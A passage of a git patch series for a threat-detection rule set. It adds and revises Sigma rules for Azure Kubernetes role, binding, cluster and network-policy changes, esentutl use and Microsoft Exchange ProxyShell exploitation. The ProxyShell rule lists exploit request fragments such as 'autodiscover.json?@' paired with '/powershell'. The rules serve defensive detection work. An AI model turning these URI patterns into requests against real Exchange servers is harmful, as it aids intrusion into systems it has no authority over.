598525ac..9dbe74ab 100644 --- a/rules/windows/process_creation/process_susp_esentutl_params.yaml +++ b/rules/windows/process_creation/process_susp_esentutl_params.yaml @@ -20,7 +20,7 @@ detection: CommandLine|contains|all: - 'esentutl' - ' /p' - condition: all of them + condition: selection falsepositives: - To be determined level: medium From f75f8fababcae40c876161c792af1fa9587caa6d Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 7 Aug 2021 15:54:43 +0200 Subject: [PATCH 0211/1367] fix file name --- ...susp_esentutl_params.yaml => process_susp_esentutl_params.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{process_susp_esentutl_params.yaml => process_susp_esentutl_params.yml} (100%) diff --git a/rules/windows/process_creation/process_susp_esentutl_params.yaml b/rules/windows/process_creation/process_susp_esentutl_params.yml similarity index 100% rename from rules/windows/process_creation/process_susp_esentutl_params.yaml rename to rules/windows/process_creation/process_susp_esentutl_params.yml From 39aaf04598375405f4b07b7c4412683b7e92aeb3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 13:05:19 -0500 Subject: [PATCH 0212/1367] Create azure_kubernetes_clusterrolebinding_modified_or_deleted.yml --- ...clusterrolebinding_modified_or_deleted.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml new file mode 100644 index 00000000..d0bac397 --- /dev/null +++ b/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml @@ -0,0 +1,25 @@ +title: Azure Kubernetes ClusterRoleBinding Modified and Deleted +id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 +description: Detects the creation or patching of potential malicious ClusterRoleBinding. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + + From ad9284e771c3e7f881a3d6d5738ae262f4209fcd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 15:30:10 -0500 Subject: [PATCH 0213/1367] Update and rename azure_kubernetes_clusterrolebinding_modified_or_deleted.yml to azure_kubernetes_rolebinding_modified_or_deleted.yml --- ... azure_kubernetes_rolebinding_modified_or_deleted.yml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename rules/cloud/{azure_kubernetes_clusterrolebinding_modified_or_deleted.yml => azure_kubernetes_rolebinding_modified_or_deleted.yml} (50%) diff --git a/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml similarity index 50% rename from rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml rename to rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml index d0bac397..67de51ff 100644 --- a/rules/cloud/azure_kubernetes_clusterrolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml @@ -1,6 +1,6 @@ -title: Azure Kubernetes ClusterRoleBinding Modified and Deleted +title: Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted id: 25cb259b-bbdc-4b87-98b7-90d7c72f8743 -description: Detects the creation or patching of potential malicious ClusterRoleBinding. +description: Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding. author: Austin Songer status: experimental date: 2021/08/07 @@ -13,13 +13,15 @@ detection: properties.message: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLEBINDINGS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLEBINDINGS/DELETE condition: selection level: medium tags: - attack.impact - attack.credential_access falsepositives: - - ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From fb88fe58bc9ea3ec4cb124889bda955ffabeb49d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 22:18:28 -0500 Subject: [PATCH 0214/1367] Create azure_kubernetes_cluster_created_or_deleted.yml --- ..._kubernetes_cluster_created_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml new file mode 100644 index 00000000..4264a428 --- /dev/null +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Kubernetes Cluster Created or Deleted +id: 9541f321-7cba-4b43-80fc-fbd1fb922808 +description: Detects when a Azure Kubernetes Cluster is created or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + + From a6f57b462a6fe6f8745e40efc91e1e01ce1acc4f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 22:58:11 -0500 Subject: [PATCH 0215/1367] Create azure_container_registry_created_or_deleted.yml --- ..._container_registry_created_or_deleted.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure_container_registry_created_or_deleted.yml diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure_container_registry_created_or_deleted.yml new file mode 100644 index 00000000..0bf949a2 --- /dev/null +++ b/rules/cloud/azure_container_registry_created_or_deleted.yml @@ -0,0 +1,21 @@ +title: Azure Container Registry Created or Deleted +id: 93e0ef48-37c8-49ed-a02c-038aab23628e +description: Detects when a Container Registry is created or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE + - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 98f4b4091495a741587bb34fcc2c1bf53a24b67b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 23:01:27 -0500 Subject: [PATCH 0216/1367] Create azure_kubernetes_service_account_modified_or_deleted.yml --- ...es_service_account_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml new file mode 100644 index 00000000..0c44f839 --- /dev/null +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: Azure Kubernetes Service Account Modified or Deleted +id: 3ef887ae-8664-45c9-9a06-70575ee49d7f +description: Identifies when a service account is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 441d6a19f5c55b84613b6c099fc781887f5fb4d4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 23:01:46 -0500 Subject: [PATCH 0217/1367] Delete azure_kubernetes_service_account_modified_or_deleted.yml --- ...es_service_account_modified_or_deleted.yml | 22 ------------------- 1 file changed, 22 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml deleted file mode 100644 index 0c44f839..00000000 --- a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml +++ /dev/null @@ -1,22 +0,0 @@ -title: Azure Kubernetes Service Account Modified or Deleted -id: 3ef887ae-8664-45c9-9a06-70575ee49d7f -description: Identifies when a service account is modified or deleted. -author: Austin Songer -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From ed542fb931c4b7486dc2bb02ae7fa89568864b54 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 7 Aug 2021 23:02:25 -0500 Subject: [PATCH 0218/1367] Create azure_kubernetes_service_account_modified_or_deleted.yml --- ...es_service_account_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml new file mode 100644 index 00000000..ddae4ee5 --- /dev/null +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml @@ -0,0 +1,22 @@ +title: Azure Kubernetes Service Account Modified or Deleted +id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 +description: Identifies when a service account is modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 1f9b2a915c6e46436eb7e627046202922ea9c4a8 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 8 Aug 2021 07:05:11 +0200 Subject: [PATCH 0219/1367] fix too many empty line --- rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml index 4264a428..be97bf7b 100644 --- a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml @@ -19,6 +19,4 @@ tags: - attack.impact falsepositives: - Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - - - + From fd8bd68479c3d512dea9a64446c26e2371aaac20 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 00:59:35 -0500 Subject: [PATCH 0220/1367] Create azure_kubernetes_sensitive_role_access.yml --- ...azure_kubernetes_sensitive_role_access.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_sensitive_role_access.yml diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_sensitive_role_access.yml new file mode 100644 index 00000000..c8f7f572 --- /dev/null +++ b/rules/cloud/azure_kubernetes_sensitive_role_access.yml @@ -0,0 +1,28 @@ +title: Azure Kubernetes Sensitive Role Access +id: +description: Identifies when ClusterRoles/Roles are being modified or deleted. +author: Austin Songer +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/ROLES/ESCALATE/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/BIND/ACTION + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/RBAC.AUTHORIZATION.K8S.IO/CLUSTERROLES/ESCALATE/ACTION + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 4ea6d47fcbb2f3a5a75c47436ba4a30d32d564d6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:00:25 -0500 Subject: [PATCH 0221/1367] Update azure_kubernetes_sensitive_role_access.yml --- rules/cloud/azure_kubernetes_sensitive_role_access.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_sensitive_role_access.yml index c8f7f572..557971a4 100644 --- a/rules/cloud/azure_kubernetes_sensitive_role_access.yml +++ b/rules/cloud/azure_kubernetes_sensitive_role_access.yml @@ -23,6 +23,5 @@ detection: level: medium tags: - attack.impact - - attack.credential_access falsepositives: - ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 44cddffa800ef9fb35132c24ecde4bf42bc6e9bb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:10:27 -0500 Subject: [PATCH 0222/1367] Update azure_kubernetes_sensitive_role_access.yml --- rules/cloud/azure_kubernetes_sensitive_role_access.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_sensitive_role_access.yml index 557971a4..2a6dab4d 100644 --- a/rules/cloud/azure_kubernetes_sensitive_role_access.yml +++ b/rules/cloud/azure_kubernetes_sensitive_role_access.yml @@ -1,5 +1,5 @@ title: Azure Kubernetes Sensitive Role Access -id: +id: 818fee0c-e0ec-4e45-824e-83e4817b0887 description: Identifies when ClusterRoles/Roles are being modified or deleted. author: Austin Songer status: experimental From 3e914d5bf5e858b50dabc08c3154f22490b5d7ff Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:10:53 -0500 Subject: [PATCH 0223/1367] Rename azure_kubernetes_sensitive_role_access.yml to azure_kubernetes_role_access.yml --- ...sensitive_role_access.yml => azure_kubernetes_role_access.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{azure_kubernetes_sensitive_role_access.yml => azure_kubernetes_role_access.yml} (100%) diff --git a/rules/cloud/azure_kubernetes_sensitive_role_access.yml b/rules/cloud/azure_kubernetes_role_access.yml similarity index 100% rename from rules/cloud/azure_kubernetes_sensitive_role_access.yml rename to rules/cloud/azure_kubernetes_role_access.yml From 357ca31382f7a0a690d13e57d754f53d3fbc9a72 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:15:23 -0500 Subject: [PATCH 0224/1367] Create azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml new file mode 100644 index 00000000..94dde701 --- /dev/null +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml @@ -0,0 +1,23 @@ +title: Azure Kubernetes Network Policy Change +id: 51d93227-8168-4907-8fb1-ffde5b654985 +description: Identifies when a Azure Kubernetes network policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From d46f0a870e133a4776b9dad03e152fff3dc8a7a2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:15:55 -0500 Subject: [PATCH 0225/1367] Delete azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml deleted file mode 100644 index 94dde701..00000000 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ /dev/null @@ -1,23 +0,0 @@ -title: Azure Kubernetes Network Policy Change -id: 51d93227-8168-4907-8fb1-ffde5b654985 -description: Identifies when a Azure Kubernetes network policy is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From e6261f42693699f0a5172bede4791fc0049fc388 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:16:18 -0500 Subject: [PATCH 0226/1367] Create azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml new file mode 100644 index 00000000..ffb7f3ce --- /dev/null +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml @@ -0,0 +1,23 @@ +title: Azure Kubernetes Network Policy Change +id: +description: Identifies when a Azure Kubernetes network policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From a584a01a9af0ea464ca8d411b16bca77cafaa8dd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:16:30 -0500 Subject: [PATCH 0227/1367] Delete azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml deleted file mode 100644 index ffb7f3ce..00000000 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ /dev/null @@ -1,23 +0,0 @@ -title: Azure Kubernetes Network Policy Change -id: -description: Identifies when a Azure Kubernetes network policy is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 4e645c10337a14a8ebbd0b96312f86af3a8b7609 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:17:01 -0500 Subject: [PATCH 0228/1367] Create azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml new file mode 100644 index 00000000..488d9886 --- /dev/null +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml @@ -0,0 +1,24 @@ +title: Azure Kubernetes Network Policy Change +id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43 +description: Identifies when a Azure Kubernetes network policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact + - attack.credential_access +falsepositives: + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 54432980922e47bedb8609de14bc37a7f14d599f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 8 Aug 2021 18:52:49 +0200 Subject: [PATCH 0229/1367] rule: ProxyShell improved --- rules/web/web_exchange_proxyshell.yml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index a838600a..b23276d0 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -7,17 +7,20 @@ references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 author: Florian Roth -date: 2020/08/07 +date: 2021/08/07 +modified: 2021/08/08 tags: - attack.initial_access logsource: category: webserver detection: - selection1: - c-uri|contains|all: - - '/autodiscover/autodiscover.json?' + selection_auto: + c-uri|contains: '/autodiscover/autodiscover.json?' + selection_uri: + c-uri|contains: - '/powershell' - selection2: + - '/mapi/nspi' + selection_poc: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions - 'autodiscover.json?@' @@ -25,7 +28,7 @@ detection: - '%3f@foo.com' - 'Email=autodiscover/autodiscover.json' - 'json?@foo.com' - condition: 1 of them + condition: selection_auto and selection_uri or selection_poc falsepositives: - - Unknown + - Could only be an attempt and not a successful attack level: high \ No newline at end of file From 01ef593727384fa15ea01acd328d76635f712124 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:11:31 -0500 Subject: [PATCH 0230/1367] Update azure_kubernetes_rolebinding_modified_or_deleted.yml --- .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git 